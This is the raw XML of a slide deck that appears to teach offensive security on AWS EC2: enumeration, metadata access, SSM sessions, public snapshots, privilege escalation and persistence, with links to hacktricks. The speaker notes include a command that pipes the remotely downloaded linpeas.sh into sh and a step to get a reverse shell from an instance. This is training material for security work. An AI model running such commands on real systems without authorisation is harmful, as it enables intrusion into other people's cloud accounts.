
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presentation.main+xml"/>
  <Default Extension="fntdata" ContentType="application/x-fontdata"/>
  <Default Extension="png" ContentType="image/png"/>
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/slide15.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17.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide17.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slides/slide4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlid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Types>
</file>

<file path=_rels/.rels>&#65279;<?xml version="1.0" encoding="utf-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><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p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono Medium"/>
      <p:regular r:id="rId24"/>
      <p:bold r:id="rId25"/>
      <p:italic r:id="rId26"/>
      <p:boldItalic r:id="rId27"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono SemiBold"/>
      <p:regular r:id="rId28"/>
      <p:bold r:id="rId29"/>
      <p:italic r:id="rId30"/>
      <p:boldItalic r:id="rId31"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Raleway ExtraBold"/>
      <p:bold r:id="rId32"/>
      <p:boldItalic r:id="rId33"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Raleway Medium"/>
      <p:regular r:id="rId34"/>
      <p:bold r:id="rId35"/>
      <p:italic r:id="rId36"/>
      <p:boldItalic r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono"/>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&#65279;<?xml version="1.0" encoding="utf-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMono-italic.fntdata" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide15.xml" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMono-boldItalic.fntdata" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide17.xml" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide16.xml" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMonoMedium-regular.fntdata" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide18.xml" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="/ppt/theme/theme1.xml" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="/ppt/viewProps.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="/ppt/presProps.xml" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="/ppt/slideMasters/slideMaster1.xml" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide4.xml" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMonoMedium-italic.fntdata" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMonoMedium-bold.fntdata" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMonoSemiBold-regular.fntdata" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMonoMedium-boldItalic.fntdata" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="/ppt/notesMasters/notesMaster1.xml" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide1.xml" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMonoSemiBold-bold.fntdata" Id="rId29"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font" Target="/ppt/fonts/RobotoMonoSemiBold-boldItalic.fntdata" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMonoSemiBold-italic.fntdata" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide6.xml" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RalewayExtraBold-boldItalic.fntdata" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide5.xml" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RalewayExtraBold-bold.fntdata" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide8.xml" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RalewayMedium-bold.fntdata" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide7.xml" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RalewayMedium-regular.fntdata" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide10.xml" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RalewayMedium-boldItalic.fntdata" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide9.xml" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RalewayMedium-italic.fntdata" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide12.xml" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMono-bold.fntdata" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide11.xml" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMono-regular.fntdata" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide14.xml" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide13.xml" Id="rId18"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56a914afd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 name="Google Shape;27;g256a914afd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07e61d87b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07e61d87b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07e61d87b5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07e61d87b5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Run instance (Amazon Linux so it has SSM installed) and login via SSH.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Then use hacktricks to contact the metadata instance and learn how to do that</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Then run: curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh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07e61d87b5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07e61d87b5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Interact with SSM of the created instance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aws ssm describe-instance-information</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>aws ssm start-session --target "$INSTANCE_ID"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s"/>
              <a:t>ps aux | grep amazon-ssm</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7e61d87b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07e61d87b5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7e61d87b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07e61d87b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07e61d87b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07e61d87b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List public AMIs &amp; EBS snapshots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07e61d87b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07e61d87b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07e61d87b5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07e61d87b5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07e61d87b5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07e61d87b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Get a rev shell from the instance and a ssh connection and change the SG to disallow all ingress and egress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18934322d1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18934322d1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207e61d87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207e61d87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07e61d87b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207e61d87b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07e61d87b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07e61d87b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07e61d87b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07e61d87b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7e61d87b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07e61d87b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07e61d87b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07e61d87b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07e61d87b5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07e61d87b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1pPr>
            <a:lvl2pPr lvl="1"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2pPr>
            <a:lvl3pPr lvl="2"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3pPr>
            <a:lvl4pPr lvl="3"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4pPr>
            <a:lvl5pPr lvl="4"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5pPr>
            <a:lvl6pPr lvl="5"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6pPr>
            <a:lvl7pPr lvl="6"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7pPr>
            <a:lvl8pPr lvl="7"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8pPr>
            <a:lvl9pPr lvl="8"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Roboto Mono Medium"/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono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Mono Medium"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono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274400"/>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Mono"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Google Shape;21;p4"/>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atin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Google Shape;24;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539525" y="1654550"/>
            <a:ext cx="8012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lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Lalalalalalalala</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>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1.png" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/ppt/media/image16.png" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="/ppt/slideLayouts/slideLayout1.xml" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="/ppt/slideLayouts/slideLayout2.xml" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="/ppt/slideLayouts/slideLayout3.xml" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="/ppt/slideLayouts/slideLayout4.xml" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="/ppt/theme/theme1.xml" Id="rId7"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Mono Medium"/>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono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74400"/>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Mono"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914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2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371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3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828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4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="22860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5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="27432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6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200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7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657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8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114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9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Google Shape;8;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8534733" y="514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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Google Shape;9;p1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8033125" y="4032625"/>
            <a:ext cx="1110876" cy="1110876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Google Shape;10;p1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4084300"/>
            <a:ext cx="1007524" cy="10075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notesSlide" Target="/ppt/notesSlides/notesSlide1.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/ppt/media/image1.png" Id="rId3" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide10.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1.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" TargetMode="External" Id="rId5" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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2.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/systems-manager/latest/userguide/ami-preinstalled-agent.html" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/systems-manager/latest/userguide/sysman-manual-agent-install.html" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/systems-manager/latest/userguide/sysman-manual-agent-install.html" TargetMode="External" Id="rId5" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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3.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/ppt/media/image15.png" Id="rId3" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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5.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum" TargetMode="External" Id="rId3" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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6.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-privilege-escalation/aws-ec2-privesc" TargetMode="External" Id="rId3" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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7.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation" TargetMode="External" Id="rId3" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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8.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-persistence/aws-ec2-persistence" TargetMode="External" Id="rId3" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide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2.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3.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4.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/ppt/media/image3.png" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/ppt/media/image14.png" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/ppt/media/image11.png" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/ppt/media/image9.png" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/ppt/media/image4.png" Id="rId7" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide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5.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/ppt/media/image13.png" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/ppt/media/image5.png" Id="rId4" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide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6.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/ppt/media/image10.png" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/ppt/media/image2.png" Id="rId4" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide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7.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/ppt/media/image12.png" Id="rId3" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide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8.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/ppt/media/image7.png" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/ppt/media/image6.png" Id="rId4" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide9.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9.xml" Id="rId2" /></Relationships>
</file>

<file path=ppt/slides/slide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3598350" y="12001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 sz="3850"/>
              <a:t>EC2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="3850"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="3850"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="3850"/>
              <a:t>Elastic Cloud Computing</a:t>
            </a:r>
            <a:endParaRPr sz="3850"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Google Shape;30;p6"/>
